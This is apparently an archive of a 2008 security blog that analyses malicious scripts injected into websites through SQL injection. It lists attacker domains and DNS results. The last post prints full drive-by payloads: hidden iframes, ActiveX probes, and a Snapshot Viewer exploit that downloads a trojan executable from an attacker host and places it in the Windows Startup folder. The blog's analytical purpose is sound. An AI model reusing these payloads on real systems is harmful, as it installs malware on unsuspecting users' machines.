Archive for July, 2008

www.worldofwarcrokft.com/jj.js

Posted in sql injection on July 31, 2008 by s3cu

jj.js essentially calls iframe ‘http://www.worldofwarcrokft.com/1/index.htm’
index.htm is 8-bit ASCII encoded. The hexdump content as follows:
Continue reading

Advertisements

*/js.js and */jj.js

Posted in sql injection on July 31, 2008 by s3cu

The old wave of attacks seems to have died down?

Have attacks using these */js.js and */jj.js malicious scripts taken over?

analysis of www.h23f.ru/ngg.js

Posted in sql injection on July 26, 2008 by s3cu

his injected domain calls iframe src from http://iroe.ru/cgi-bin/index.cgi?ad

Continue reading

www.o1o2qq.cn/ri.js

Posted in sql injection on July 22, 2008 by s3cu

another injected script src.
The script redirects to direct URL depending on whether your browser is set to chinese language.
Content as follows: Continue reading

www.liwejr.cn/c4.htm?b029

Posted in sql injection on July 22, 2008 by s3cu

this injected iframe src, calls go.html

go.html calls exploits from user1.date-21.net

contents of go.html as follows Continue reading

*/ngg.js (update 2)

Posted in sql injection on July 18, 2008 by s3cu

More *.ru domains

Surfing to the main page of say http://www.nudk.ru, the website of Cash-Transfers Inc. appears.

Compare “dig http://www.iogp.ru” and “www.cashtransfers.tk”

;; ANSWER SECTION:
http://www.iogp.ru.        200    IN    A    76.73.139.26
http://www.iogp.ru.        200    IN    A    81.109.236.138
http://www.iogp.ru.        200    IN    A    98.14.3.126
http://www.iogp.ru.        200    IN    A    71.62.120.230
http://www.iogp.ru.        200    IN    A    76.30.118.52
http://www.iogp.ru.        200    IN    A    24.20.116.38
http://www.iogp.ru.        200    IN    A    74.128.165.226
http://www.iogp.ru.        200    IN    A    76.118.74.21
http://www.iogp.ru.        200    IN    A    24.86.16.225
http://www.iogp.ru.        200    IN    A    65.96.41.17
http://www.iogp.ru.        200    IN    A    70.79.211.89
http://www.iogp.ru.        200    IN    A    76.199.17.243
http://www.iogp.ru.        200    IN    A    123.195.179.249
http://www.iogp.ru.        200    IN    A    194.44.214.81
http://www.iogp.ru.        200    IN    A    71.228.191.159;

; ANSWER SECTION:
http://www.cashtransfers.tk.    600    IN    A    194.44.214.81
http://www.cashtransfers.tk.    600    IN    A    76.30.118.52
http://www.cashtransfers.tk.    600    IN    A    71.228.191.159
http://www.cashtransfers.tk.    600    IN    A    65.96.41.17
http://www.cashtransfers.tk.    600    IN    A    81.109.236.138
http://www.cashtransfers.tk.    600    IN    A    76.199.17.243
http://www.cashtransfers.tk.    600    IN    A    89.139.15.213
http://www.cashtransfers.tk.    600    IN    A    74.128.165.226
http://www.cashtransfers.tk.    600    IN    A    76.73.139.26
http://www.cashtransfers.tk.    600    IN    A    76.118.74.21
http://www.cashtransfers.tk.    600    IN    A    71.62.120.230
http://www.cashtransfers.tk.    600    IN    A    70.79.211.89
http://www.cashtransfers.tk.    600    IN    A    24.20.116.38
http://www.cashtransfers.tk.    600    IN    A    79.87.139.200
http://www.cashtransfers.tk.    600    IN    A    98.14.3.126

What is Cash Transfer Inc. ? Maybe this spam mail can give some clue…

www.eoai114.cn and user1.jzm010.cn

Posted in Uncategorized on July 17, 2008 by s3cu

malicious content here…

Content of index.html
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write("<Iframe src=http://user1.jzm010.cn/ilink.html width=100 height=0
></iframe>");
}
else{document.write("<Iframe src=http://user1.jzm010.cn/flink.html width=100 hei
ght=0></iframe>");}
}
document.writeln("<Iframe src=http:\/\/www.dxp008.cn\/b2.htm width=50 height=0><
\/iframe>")

Content of aa2.htm?20
<Iframe src="http://user1.jzm010.cn/14.htm" width=100 height=0></iframe>
<Iframe src="http://user1.jzm010.cn/fx.htm" width=100 height=0></iframe>
<Iframe src="http://user1.jzm010.cn/ac.htm" width=100 height=0></iframe>
<script>
var kaspersky="woyaofa"
var L_czcY_1 = new window["Date"]()
L_czcY_1["setTime"](L_czcY_1["getTime"]() + 3*60*60*1000)
var Jy2$2 = new window["String"](window["document"]["cookie"])
var sX$bhbGk3 = "Cookie1="
var zecKZZ4 = Jy2$2["indexOf"](sX$bhbGk3)
if (zecKZZ4 == -1)
{
window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ L_czcY_1["toGMTStri
ng"]()
try{if(new window["ActiveXObject"]("GLIEDown.IEDown.1"))window["document"]["writ
e"]('<iframe style=display:none src="http://user1.jzm010.cn/newlz.htm"></iframe>
');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["writ
e"]('<iframe style=display:none src="http://user1.jzm010.cn/real11.htm"></iframe
>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["writ
e"]('<iframe style=display:none src="http://user1.jzm010.cn/real10.htm"></iframe
>');}catch(e){}
try{if(new window["ActiveXObject"]("GLCHAT.GLChatCtrl.1"))window["document"]["wr
ite"]('<iframe style=display:none src="http://user1.jzm010.cn/lz.htm"></iframe>'
);}catch(e){}
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=1;
}
</script>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/
1812235.js"></script>

Let’s follow one of the link user1.jzm010.cn/ac.htm

<html><object classid="clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9" id="obj"></object>
<script language="javascript">
var buf1 = "http://dddd.nihao69.cn/down/ko.exe";
var buf2 = "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/qq.exe";
obj.SnapshotPath = buf1;obj.CompressedPath = buf2;obj.PrintSnapshot();
</script></html>
<Iframe src="http://user1.jzm010.cn/ce.htm" width=100 height=0></iframe>

what’s this? It’s exploiting MS Snapshot Viewer ActiveX control to download trojan.

Let’s follow another link user1.jzm010.cn/ce.htm
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="MSHTML 6.00.2900.3354" name=GENERATOR></HEAD>
<BODY>
<OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT>
<SCRIPT>
var YEtYcJsR1="http://dddd.nihao69.cn/down/ko.exe";
install["DownloadAndInstall"](YEtYcJsR1);
</SCRIPT>
</BODY></HTML>

what’s is this clsid? could be another new exploit